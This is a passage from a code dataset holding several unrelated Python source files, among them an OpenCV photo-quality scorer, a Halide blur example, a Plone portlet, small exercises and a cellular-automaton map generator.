cv2.COLOR_BGR2GRAY)\n            a[iW][iH] = int(get_variance_of_laplacian(icrop))\n\n    for iW in range(0, iMax, 1):\n        for iH in range(0, iMax, 1):\n            if a[iH][iW] < np.mean(a):\n\n                cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n                            cv2.FONT_HERSHEY_SIMPLEX, 0.5, (100, 100, 100), 2)\n                cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                         (int(width * iW / iMax), int(height * iMax / iMax)), (100, 100, 100), 1)\n                cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                         (int(width * iMax / iMax), int(height * iH / iMax)), (100, 100, 100), 1)\n            else:\n                if a[iH][iW] < np.max(a) * 0.5:\n                    cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n                                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (250, 250, 230), 2)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iW / iMax), int(height * iMax / iMax)), (200, 100, 255), 1)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iMax / iMax), int(height * iH / iMax)), (200, 100, 255), 1)\n                else:  # max\n                    cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n                                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iW / iMax), int(height * iMax / iMax)), (0, 0, 255), 1)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iMax / iMax), int(height * iH / iMax)), (0, 0, 255), 1)\n    return a\n\n\n# Contour analysis\ndef 
print_conturs_of_image(img, iMax):\n    a = list(range(iMax))  # a list per grid row\n    for iW in range(0, iMax, 1):\n        a[iW] = list(range(iMax))\n        scale_percent = 100\n        width = int(img.shape[1] * scale_percent / 100)\n        height = int(img.shape[0] * scale_percent / 100)\n        for iH in range(0, iMax, 1):\n            crop_img = img[int(height * iH / iMax):int(height * (iH + 1) / iMax),\n                           int(width * iW / iMax):int(width * (iW + 1) / iMax)]\n            crop_img = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n            icrop = cv2.Canny(crop_img, 5, 300)\n            contours, hierarchy = cv2.findContours(icrop,\n                                                   cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n            a[iW][iH] = int(len(contours))\n            # cv2.drawContours(img, contours, -1, (0, 255, 255), 1)\n\n    for iW in range(0, iMax, 1):\n        for iH in range(0, iMax, 1):\n\n            if a[iH][iW] < np.mean(a):\n                cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n                            cv2.FONT_HERSHEY_SIMPLEX, 0.5, (100, 100, 100), 1)\n                cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                         (int(width * iW / iMax), int(height * iMax / iMax)), (200, 255, 255), 1)\n                cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                         (int(width * iMax / iMax), int(height * iH / iMax)), (200, 255, 255), 1)\n            else:\n                if a[iH][iW] < int(np.max(a) * 0.5):\n                    h1 = int(height * iH / iMax)\n                    h2 = int(height * (iH + 1) / iMax)\n                    w1 = int(width * iW / iMax)\n                    w2 = int(width * (iW + 1) / iMax)\n\n                    cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n                                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (250, 250, 230), 1)  # 255, 215, 0\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iW / iMax), int(height * iMax / iMax)), (200, 255, 255), 1)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iMax / iMax), int(height * iH / iMax)), (200, 255, 255), 1)\n                else:  # max\n                    cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n                                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iW / iMax), int(height * iMax / iMax)), (220, 200, 0), 1)\n                    cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n                             (int(width * iMax / iMax), int(height * iH / iMax)), (220, 200, 0), 1)\n    return a\n\n\ndef draw_histogram(image, filename):\n    image_blue = image[:, :, 0]\n    image_green = image[:, :, 1]\n    image_red = image[:, :, 2]\n\n    X_b = np.array(image_blue.flatten())[:, np.newaxis]\n    X_g = np.array(image_green.flatten())[:, np.newaxis]\n    X_r = np.array(image_red.flatten())[:, np.newaxis]\n\n    # print(\"Image loaded and split into channels successfully!\")\n    fig, (RGB, blue, green, red) = plt.subplots(4, 1)\n    fig.set_size_inches(18.5, 10.5)\n\n    RGB.set_title('RGB histogram:', fontsize=12)\n    sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"blue\", label=\"Blue channel\")\n    sns.distplot(X_g, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"green\", label=\"Green channel\")\n    sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"red\", label=\"Red channel\")\n    RGB.legend(loc='upper right')\n\n    blue.set_title('Blue channel:', fontsize=12)\n    sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=False, ax=blue, color=\"blue\", label=\"Blue channel\")\n    blue.legend(loc='upper right')\n\n    green.set_title('Green channel:', fontsize=12)\n    sns.distplot(X_g, bins=256, kde=False, rug=False, 
norm_hist=False, ax=green, color=\"green\", label=\"Green channel\")\n    green.legend(loc='upper right')\n\n    red.set_title('Red channel:', fontsize=12)\n    sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=False, ax=red, color=\"red\", label=\"Red channel\")\n    red.legend(loc='upper right')\n\n    plt.savefig(TRAINED_FACES_PATH + \"/\" + \"img/2/\" + filename)\n\n    # Extrema\n    bandwidth = 10\n\n    X_plot = np.linspace(0, 255, 256)[:, np.newaxis]\n    # print(type(X_plot))\n    # print(\"Loading the colour-channel data into the model; the model is built for each channel separately\")\n    kde_blue = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_b)\n    # print(\"Approximation for the blue channel computed successfully!\")\n    kde_green = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_g)\n    # print(\"Approximation for the green channel computed successfully!\")\n    kde_red = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_r)\n    # print(\"Approximation for the red channel computed successfully!\")\n    log_dens_blue = kde_blue.score_samples(X_plot)\n    log_dens_green = kde_green.score_samples(X_plot)\n    log_dens_red = kde_red.score_samples(X_plot)\n\n    fig_2, (blue_kde, green_kde, red_kde) = plt.subplots(3, 1)\n    fig_2.set_size_inches(18.5, 10.5)\n\n    sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=True, ax=blue_kde, color=\"blue\", label=\"Blue Channel\")\n    sns.distplot(X_g, bins=256, kde=False, rug=False, norm_hist=True, ax=green_kde, color=\"green\",\n                 label=\"Green Channel\")\n    sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=True, ax=red_kde, color=\"red\", label=\"Red Channel\")\n    blue_kde.plot(X_plot[:, 0], np.exp(log_dens_blue), '-', label=\"Kernel - Epanechnikov\")\n    green_kde.plot(X_plot[:, 0], np.exp(log_dens_green), '-', label=\"Kernel - Epanechnikov\")\n    red_kde.plot(X_plot[:, 0], np.exp(log_dens_red), '-', label=\"Kernel - Epanechnikov\")\n\n    blue_kde.legend(loc='upper right')\n    green_kde.legend(loc='upper right')\n    red_kde.legend(loc='upper right')\n\n    fig_3, (diff_ax) = plt.subplots(1, 1)\n    fig_3.set_size_inches(18.5, 10.5)\n\n    ################################### Computing the first derivative ######################################\n    diff = np.gradient(np.exp(log_dens_blue))\n    diff_list = list(diff)\n    xc_1, xi_1 = pyaC.zerocross1d(X_plot[:, 0], diff, getIndices=True)\n\n    # zeros_list = list(int(x) for x in xc_1)\n    zeros = np.array(np.reshape(xc_1, (len(xc_1), 1)))\n    samples = kde_blue.score_samples(zeros)\n    log_dens_blue_in_zeros = np.exp(samples)\n    # plot the approximation function and its first derivative #\n    diff_ax.set_ylim(-0.005, 0.025)\n    diff_ax.axhline(y=0, color=\"black\")\n    diff_ax.set_title('First derivative over KDE Function (Epanechnikov):', fontsize=12)\n    diff_ax.plot(X_plot[:, 0], diff, color=\"red\", label=\"First derivative of the approximation function\")\n    diff_ax.scatter(xc_1, log_dens_blue_in_zeros, marker='*', s=130, color=\"blue\", label=\"Zero of the derivative - an extremum\")\n    diff_ax.plot(X_plot[:, 0], np.exp(log_dens_blue), '-', label=\"Approximation function with the Epanechnikov kernel\")\n    diff_ax.legend(loc='upper right')\n\n    # Check that the global extremum falls within [0, 255] and assign a lighting level from its X coordinate\n    # Extremum coordinates:\n\n    m = max(samples)\n    index_global_max = [i for i, j in enumerate(samples) if j == m]\n    X_extremum = int(xc_1[index_global_max[0]])\n\n    rec = \"\"\n    if X_extremum in range(0, 43):\n        rec = \"Image is too dark -3exp\"\n    elif X_extremum in range(43, 
85):\n        rec = \"Image is quite dark -2exp\"\n    elif X_extremum in range(85, 128):\n        rec = \"Image is slightly dark -1exp\"\n    elif X_extremum in range(128, 170):\n        rec = \"Image is slightly bright +1exp\"\n    elif X_extremum in range(170, 212):\n        rec = \"Image is quite bright +2exp\"\n    elif X_extremum in range(212, 255):\n        rec = \"Image is too bright +3exp\"\n\n    #\n\n    plt.savefig(TRAINED_FACES_PATH + \"/\" + \"img/4/\" + filename)\n\n    return X_extremum, rec\n\n\ndef analyze_photo(cat, filename, id_tut):\n    url = cat + filename\n\n    image = _grab_image(url=url)\n    gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    fm = get_variance_of_laplacian(gray_img)\n\n    faces = detector.detectMultiScale(gray_img, scaleFactor=1.1, minNeighbors=5,\n                                      minSize=(30, 30), flags=0)\n    for (x, y, w, h) in faces:\n        cv2.rectangle(gray_img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n        roi_gray = gray_img[y:y + h, x:x + w]\n        roi_color = image[y:y + h, x:x + w]\n        eyes = detector.detectMultiScale(roi_gray)  # NOTE: reuses the face cascade inside the face ROI; no eye cascade is defined\n        for (ex, ey, ew, eh) in eyes:\n            cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)\n\n    # draw the lines\n    draw_lines_of_composition(image)\n    # composition\n    cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/1/\" + filename, image)\n\n    image = _grab_image(url=url)\n    # focus: Laplacian\n    a = print_blur_image(image, 9)\n    # focus\n    iMax = 9\n    total = 0\n    for iW in range(0, iMax, 1):\n        for iH in range(0, iMax, 1):\n            if iH == 0 or iH == 8 or iW == 0 or iW == 8:\n                a[iH][iW] = int(a[iH][iW] * 0.25)\n            elif iH == 1 or iH == 7 or iW == 1 or iW == 7:\n                a[iH][iW] = int(a[iH][iW] * 0.5)\n            elif iH == 2 or iH == 6 or iW == 2 or iW == 6:\n                a[iH][iW] = int(a[iH][iW] * 0.75)\n            total = total + a[iH][iW]\n    fcs = 0.5 * (int(fm) + int(total / (iMax * iMax)))\n\n    cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/0/\" + filename, image)\n    cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/5/\" + filename, gray_img)\n\n    # focus: contours\n    imgcn = _grab_image(url=url)\n    gray = cv2.cvtColor(imgcn, cv2.COLOR_BGR2GRAY)\n    cnt_0 = get_conturs(imgcn, gray)\n    a = print_conturs_of_image(imgcn, 9)\n\n    total = 0\n    for iW in range(0, iMax, 1):\n        for iH in range(0, iMax, 1):\n            if iH == 0 or iH == 8 or iW == 0 or iW == 8:\n                a[iH][iW] = int(a[iH][iW] * 0.25)\n            elif iH == 1 or iH == 7 or iW == 1 or iW == 7:\n                a[iH][iW] = int(a[iH][iW] * 0.5)\n            elif iH == 2 or iH == 6 or iW == 2 or iW == 6:\n                a[iH][iW] = int(a[iH][iW] * 0.75)\n            total = total + a[iH][iW]\n    cnt = 0.5 * (int(cnt_0) + int(total / (iMax * iMax)))\n\n    cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/3/\" + filename, imgcn)\n\n    # histogram\n    imgcn = _grab_image(url=url)\n    lgh, rec = draw_histogram(imgcn, filename)\n    res = int((fcs + cnt + lgh) / 3)\n\n    text = \"\"\n    return 'Image processed ' + \"{}{:.2f}\".format(text, fm), fcs, cnt, lgh, res, rec\n","repo_name":"anastasia-zamula/img-rcm-sys","sub_path":"app/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":19019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"28192287823","text":"import sys; sys.path += ['..', '.']\nfrom halide import *\n\nOUT_DIMS = (6400, 4864, 3)\n\ndef filter_func(dtype=UInt(16)):\n    \"Simple 3x3 blur.\"\n    input = UniformImage(dtype, 2, 'input')\n    x = Var('x')\n    y = Var('y')\n    #c = Var('c')\n    blur_x = Func('blur_x')\n    blur_y = Func('blur_y')\n\n    blur_x[x,y] = (input[x,y]+input[x+1,y]+input[x+2,y])/3\n    blur_y[x,y] = (blur_x[x,y]+blur_x[x,y+1]+blur_x[x,y+2])/3\n\n    tune_ref_schedules = {'human': \\
        \"blur_y.split(y, y, yi, 
8).parallel(y).vectorize(x, 8)\\n\" \\\n \"blur_x.chunk(y, yi).vectorize(x, 8)\"}\n #tune_constraints = 'blur_y.bound(c, 0, 3)'\n tune_in_images = ['apollo1.png']\n tune_out_dims = OUT_DIMS\n\n return (input, blur_y, None, locals())\n\ndef main():\n (input, out_func, evaluate, local_d) = filter_func()\n\n x, y = local_d['x'], local_d['y'] #, local_d['c']\n blur_x, blur_y = local_d['blur_x'], local_d['blur_y']\n\n xi, yi = Var('xi'), Var('yi')\n\n schedule = 1\n \n if schedule == 0: # Human schedule, no store-compute chunking\n blur_y.tile(x, y, xi, yi, 8, 4).parallel(y).vectorize(xi, 8)\n blur_x.chunk(x).vectorize(x, 8)\n elif schedule == 1:\n blur_y.split(y, y, yi, 8).parallel(y).vectorize(x, 8)\n blur_x.chunk(y, yi).vectorize(x, 8)\n \n test = filter_image(input, out_func, os.path.join(inputs_dir(), 'apollo.png'), disp_time=True, out_dims = OUT_DIMS, times=5)().show()\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"hksonngan/Halide","sub_path":"py_bindings/examples/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"27471857403","text":"from zope import schema\nfrom zope.component import getMultiAdapter\nfrom zope.formlib import form\nfrom zope.interface import implements\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFPlone import PloneMessageFactory as _\nfrom isaw.theme.portlets.widget import ImageWidget\n\nclass IFeaturedPortlet(IPortletDataProvider):\n\n image = schema.Field(\n title=_(u'Featured Image'),\n description=_(u'A small image from the current feature'),\n required=False)\n\n featured_title = schema.TextLine(\n title=_(u'Title of Current Feature'),\n description=_(u'Title to appear on the front page about current feature.'),\n required=False)\n \n featured_description = schema.Text(\n title=_(u'Description of Current Feature'),\n description=_(u'Description of current feature as it will appear on the front page.'),\n required=False)\n\n featured_lefttext = schema.TextLine(\n title=_(u'The text that appears to the left of this portlet'),\n description=_(u'Text to appear on the left'),\n required=False)\n\nclass Assignment(base.Assignment):\n implements(IFeaturedPortlet)\n\n header = u''\n image = None\n assignment_context_path = None\n\n def __init__(self,\n image=None, \n featured_title=None,\n featured_description=None,\n featured_lefttext=None,\n header=None,\n assignment_context_path=None):\n\n self.image = image\n self.featured_title = featured_title\n self.featured_description = featured_description\n self.featured_lefttext = featured_lefttext\n self.header = header\n self.assignment_context_path = assignment_context_path\n\n @property\n def title(self):\n if self.header:\n return self.header\n else:\n return _(u\"Feature Portlet\")\n\nclass Renderer(base.Renderer):\n\n render = ViewPageTemplateFile('feature.pt')\n\n def title(self):\n return self.data.featured_title\n\n def description(self):\n return self.data.featured_description\n\n def lefttext(self):\n return self.data.featured_lefttext\n\n @property\n def image_tag(self):\n if self.data.image:\n state=getMultiAdapter((self.context, self.request),\n name=\"plone_portal_state\")\n portal=state.portal()\n #assignment_url = \\\n # portal.unrestrictedTraverse(\n # self.data.assignment_context_path).absolute_url()\n assignment_url = 
\"isaw/++contextportlets++plone.rightcolumn\"\n            width = self.data.image.width\n            height = self.data.image.height\n            return \"<img src='%s/%s/image' alt='%s' />\" % \\\n                   (assignment_url,\n                    self.data.__name__,\n                    self.data.featured_description)\n        return None\n\nclass AddForm(base.AddForm):\n    form_fields = form.Fields(IFeaturedPortlet)\n    form_fields['image'].custom_widget = ImageWidget\n    label = _(u\"Add Featured Portlet\")\n\n    def create(self, data):\n        assignment_context_path = \\\n            '/'.join(self.context.__parent__.getPhysicalPath())\n        return Assignment(assignment_context_path=assignment_context_path, **data)\n\nclass EditForm(base.EditForm):\n    \n    form_fields = form.Fields(IFeaturedPortlet)\n    form_fields['image'].custom_widget = ImageWidget\n    description = _(u\"This portlet displays featured front page copy.\")\n","repo_name":"isaw/isaw.web","sub_path":"src/isaw.theme/isaw/theme/portlets/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
+{"seq_id":"24212946494","text":"\"\"\"\n1. Implement the factorial function and test it with several different values.\nCross-check with a calculator.\n\"\"\"\n\nfrom math import factorial\nfrom random import randint\n\ncount = 1\n\nwhile count != 6:\n    x = randint(0, 7)\n    print(\"Test \" + str(count) + \" for number \" + str(x) + \":\", factorial(x))\n    count += 1\n","repo_name":"nihathalici/Full-Speed-Python","sub_path":"C06-Exercises-with-recursive-functions/Question-1.py","file_name":"Question-1.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"30453655028","text":"# coding: utf-8\n\nimport bottle\nimport cloudcode\n\n__author__ = 'asaka'\n\n\n@bottle.route('/')\ndef index():\n    return 'Hello LeanCloud!'\n\n\n@cloudcode.cloud_func\ndef add(params):\n    user = cloudcode.user\n    return params['x'] + params['y']\n\n\n@cloudcode.cloud_hook('Album', 'before_save')\ndef before_album_save(obj):\n    user = cloudcode.user\n    return 'ok'\n\n\napp = bottle.default_app()\napp = cloudcode.wrap(app)\n\nif __name__ == '__main__':\n    cloudcode.run('localhost', 5000, app)\n","repo_name":"aisk/cloudcode-python-sdk","sub_path":"examples/bottle_example.py","file_name":"bottle_example.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
+{"seq_id":"1752014168","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n\nnp.random.seed(0)\nx = np.random.rand(50, 1) * 10 # random values between 0 and 10\ny = 2 * x + 1 + np.random.randn(50, 1) # noise added around the true line y = 2x + 1\n\n# x and y are the NumPy arrays built above and represent the x and y values of the dataset.\n# The .flatten() method makes a multidimensional NumPy array one-dimensional, which gives a neater structure when creating the Pandas DataFrame.\n# The expression pd.DataFrame({'x': x.flatten(), 'y': y.flatten()}) creates a Pandas DataFrame containing the x and y values. This DataFrame consists of two columns, an x column and a y column. 
Each row holds the corresponding pair of x and y values.\ndata = pd.DataFrame({'x': x.flatten(), 'y': y.flatten()})\n\n# Creating the regression model\nregression_model = LinearRegression()\nregression_model.fit(x, y)\n\n# Drawing the regression line\nplt.figure(figsize=(10, 6))\nplt.scatter(data['x'], data['y'], label='Data Points')\nplt.plot(x, regression_model.predict(x), color='red', label='Regression Line')\nplt.title('Data Regression Example')\nplt.xlabel('x Value')\nplt.ylabel('y Value')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"gzmsrtkyozyldz/machine-learning","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"27523898109","text":"entry = input().split(' : ')\ndi = {}\nwhile entry[0] != 'end':\n    name = entry[1]\n    course = entry[0]\n\n    if course not in di:\n        di[course] = []\n    di[course].append(name)\n    entry = input().split(' : ')\n\nfor course, students in di.items():\n    print(f\"{course}: {len(students)}\")\n    for name_of_student in students:\n        print(f\"-- {name_of_student}\")\n# sorted_= sorted(di.items(),key=)","repo_name":"MbStanchev/SoftUni","sub_path":"Fundamentals/UPR/UPR7_dictionary/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"32536115923","text":"#############################################################################\ndef _random(min, max): #IT'S JUST A WRAPPER. Min, max inclusive!          #\n    return _rand(max-min+1)+min                                             #\n                                                                            #\n_LCG_X = None                                                               #\n                                                                            #\ndef setRandomSeed(seed): # FOR TEH GREAT INDEPENDENCY!\n    global _LCG_X                                                           #\n    _LCG_X = seed                                                           #\n                                                                            #\ndef _rand(mod):                                                             #\n    global _LCG_X                                                           #\n    if _LCG_X is None:                                                      #\n        _LCG_X = 7355608                                                    #\n    LCG_A = 14741                                                           #\n    LCG_C = 757                                                             #\n    LCG_M = 77777677777                                                     #\n    _LCG_X = (LCG_A*_LCG_X + LCG_C) % LCG_M                                 #\n    return _LCG_X%mod                                                       #\n#############################################################################\n\ndef randHorDir(): #What a shame.\n    return _random(-1, 1)\n\ndef randVertDir(): #What a shame.\n    val = _random(0, 100)\n    if val < 30:\n        return -1\n    elif val > 70:\n        return 1\n    else:\n        return 0\n\n\nTOTAL_LAND_AUTOMS = 8\nTOTAL_MNT_AUTOMS = 5\nTOTAL_FOREST_AUTOMS = 12\nTOTAL_FIELD_AUTOMS = 5\nLAND_CYCLES = 620\nMNT_CYCLES = 175\nFOREST_CYCLES = 50\nFIELD_CYCLES = 15\n#_SINGLE_ELEMENT_PLACEMENT_TRIES = 10000\n_WATER_CODE = '~'\n_GROUND_CODE = '.'\n_MOUNTAIN_CODE = '^'\n_FOREST_CODE = 'f'\n_FIELD_CODE = '\"'\n_TOWN_CODE = 'O'\n_MILITARY_BASE_CODE = '%'\n_LAB_CODE = '&'\n\nclass Automata:\n    def __init__(self, x, y, maparr, brush, allowed = []):\n        self.x = x\n        self.y = y\n        self.maparr = maparr\n        self.brush = brush\n        self.allowed = allowed\n        self.allowed.append(self.brush)\n\n    def step(self):\n        MAX_DIRECTION_TRIES = 1000\n        dx = randHorDir()\n        dy = randVertDir()\n        for _ in range(MAX_DIRECTION_TRIES):\n            while dx*dy != 0 or dx == dy:\n#                randomize()\n                dx = randHorDir()\n                dy = randVertDir()\n            if (0 < self.x+dx < len(self.maparr)-2 and 0 < self.y+dy < len(self.maparr[0])-2) and self.maparr[self.x+dx][self.y+dy] in self.allowed:\n                self.x += dx\n                self.y += dy\n                self.maparr[self.x][self.y] = self.brush\n                break\n\ndef addLandscapeElements(maparr, automs, brush, allowed:list, cycles, randomPlacement = True, minDistanceToMapBorder = 15):\n    mapW = len(maparr)\n    mapH = len(maparr[0])\n    auts = []\n    if randomPlacement:\n        for i in range(1, automs + 1):\n            selx = 
_random(0+minDistanceToMapBorder, mapW-minDistanceToMapBorder)\n            sely = _random(0+minDistanceToMapBorder, mapH-minDistanceToMapBorder)\n            while maparr[selx][sely] not in allowed:\n                selx = _random(0 + minDistanceToMapBorder, mapW - minDistanceToMapBorder)\n                sely = _random(0 + minDistanceToMapBorder, mapH - minDistanceToMapBorder)\n            auts.append(Automata(selx, sely, maparr, brush, allowed))\n    else:\n        for i in range(1, automs+1):\n            x = i * mapW // (TOTAL_LAND_AUTOMS + 1)\n            y = i * mapH // (TOTAL_LAND_AUTOMS + 1)\n            auts.append(Automata(x, y, maparr, _GROUND_CODE, [_WATER_CODE]))\n    for aut in auts:\n        for _ in range(cycles):\n            aut.step()\n\n\ndef countSurroundings(maparr, x, y, code): #returns the number of neighbouring tiles of the given kind\n    mapW = len(maparr)\n    mapH = len(maparr[0])\n    result = 0\n    for i in [-1, 0, 1]:\n        for j in [-1, 0, 1]:\n            if not (0 < x+i < mapW and 0 < y+j < mapH):\n                continue\n            if (i != 0 or j != 0) and maparr[x+i][y+j] == code:\n                result += 1\n    return result\n\n\n#Crap, but working\ndef tryRandomlyAddSingleElements(maparr, elemCode, neighbours:list, neighborMinNumber:list, elemCount:int, minDistance = 2):\n    _SINGLE_ELEMENT_PLACEMENT_TRIES = 500\n    #adds some single-tile element (i.e. town, military base...) on the random map\n    mapW = len(maparr)\n    mapH = len(maparr[0])\n    x = 0\n    y = 0\n    placedXcoords = [0] * (elemCount+1) #coords of already placed elems\n    placedYcoords = [0] * (elemCount+1) #coords of already placed elems\n    totalPlaced = 0\n\n    for currentPlacingElementNumber in range(elemCount+1):\n        for _ in range(_SINGLE_ELEMENT_PLACEMENT_TRIES):\n            successfulPlacement = True\n            distanceSatisfied = False\n            # The first element has no distance constraint, so pick its spot here;\n            # previously x, y stayed at (0, 0) for the first element.\n            x = _random(1, mapW - 1)\n            y = _random(1, mapH - 1)\n            #The following loop is the distance check.\n            #Elems should not be placed closer than minDistance allows\n            while not distanceSatisfied and currentPlacingElementNumber > 0:\n                x = _random(1, mapW - 1)\n                y = _random(1, mapH - 1)\n                for i in range(currentPlacingElementNumber):\n                    if (x-placedXcoords[i]) ** 2 + (y - placedYcoords[i]) ** 2 < minDistance ** 2:\n                        distanceSatisfied = False\n                        break\n                else:\n                    distanceSatisfied = True\n            #Checking necessary neighbours condition.\n            for i, currentCheck in enumerate(neighbours):\n                currentCheckCount = countSurroundings(maparr, x, y, currentCheck)\n                if currentCheckCount < neighborMinNumber[i]:\n                    successfulPlacement = False\n                    break\n            if not successfulPlacement:\n                continue\n            #place elems, add placed coords to the array.\n            maparr[x][y] = elemCode\n            if (currentPlacingElementNumber != elemCount):\n                placedXcoords[currentPlacingElementNumber] = x\n                placedYcoords[currentPlacingElementNumber] = y\n            totalPlaced += 1\n            break\n    if totalPlaced < elemCount:\n        return False\n    return True\n\n#TODO: add the possibility to choose unnecessary neighbours (like \"mountain OR forest\")\n#TODO: SPEED THE FUCK UP THIS CRAP!\ndef tryAddSingleElements(maparr, elemCode, neighbours:list, neighborMinNumber:list, elemCount:int, minDistance = 2):\n    #adds some single-tile element (i.e. town, military base...) 
on the random map\n    mapW = len(maparr)\n    mapH = len(maparr[0])\n    x = 1\n    y = 1\n    placedXcoords = [0] * elemCount #coords of already placed elems\n    placedYcoords = [0] * elemCount #coords of already placed elems\n    totalPlaced = 0\n    for currentPlacingElementNumber in range(elemCount):\n        #for _ in range(_SINGLE_ELEMENT_PLACEMENT_TRIES): # <-- not needed if placement coords aren't random...\n        distanceSatisfied = False\n        while True:\n            successfulPlacement = True\n            x += 1#random(1, mapW - 1)\n            #y = _random(1, mapH - 1)\n            if x >= mapW:\n                x = 0\n                y+=1\n                if (y == mapH):\n                    return False\n            if maparr[x][y] == _WATER_CODE:\n                continue\n            #check distance satisfaction...\n            if currentPlacingElementNumber > 0:\n                for i in range(currentPlacingElementNumber):\n                    currSquareDist = (x-placedXcoords[i]) ** 2 + (y - placedYcoords[i]) ** 2\n                    distanceSatisfied = currSquareDist >= minDistance ** 2\n                    if not distanceSatisfied:\n                        break\n                # NB: this skip-ahead must stay inside the branch above, otherwise\n                # currSquareDist is unbound when placing the first element.\n                if not distanceSatisfied:\n                    x += currSquareDist//4\n                    continue\n            #Checking necessary neighbouring tiles condition.\n            for i, currentCheck in enumerate(neighbours):\n                currentCheckCount = countSurroundings(maparr, x, y, currentCheck)\n                if currentCheckCount < neighborMinNumber[i]:\n                    successfulPlacement = False\n                    break\n            if not successfulPlacement:\n                continue\n            #place elems, add placed coords to the arrays.\n            maparr[x][y] = elemCode\n            if (currentPlacingElementNumber != elemCount):\n                placedXcoords[currentPlacingElementNumber] = x\n                placedYcoords[currentPlacingElementNumber] = y\n            totalPlaced += 1\n            break\n    if totalPlaced < elemCount:\n        return False\n    return True\n\n\n# def drawMap(maparr):\n#     for i in range(len(maparr)):\n#         for j in range(len(maparr[i])):\n#             if maparr[i][j] == _WATER_CODE:\n#                 setForegroundColor(0, 64, 255)\n#             elif maparr[i][j] == _GROUND_CODE:\n#                 setForegroundColor(200, 64, 64)\n#             elif maparr[i][j] == _MOUNTAIN_CODE:\n#                 setForegroundColor(200, 200, 200)\n#             elif maparr[i][j] == _FOREST_CODE:\n#                 setForegroundColor(0, 255, 64)\n#             elif maparr[i][j] == _FIELD_CODE:\n#                 setForegroundColor(220, 220, 0)\n#             elif maparr[i][j] == _TOWN_CODE:\n#                 setForegroundColor(255, 128, 255)\n#             elif maparr[i][j] == _MILITARY_BASE_CODE:\n#                 setForegroundColor(255, 0, 0)\n#             elif maparr[i][j] == _LAB_CODE:\n#                 setForegroundColor(0, 255, 255)\n#             putChar(maparr[i][j], i, j)\n\ndef generateMap(mapW, mapH):\n    while True:\n        maparr = [[_WATER_CODE] * (mapH) for _ in range(mapW)]\n        #land\n        addLandscapeElements(maparr, TOTAL_LAND_AUTOMS, _GROUND_CODE, [_WATER_CODE], LAND_CYCLES, 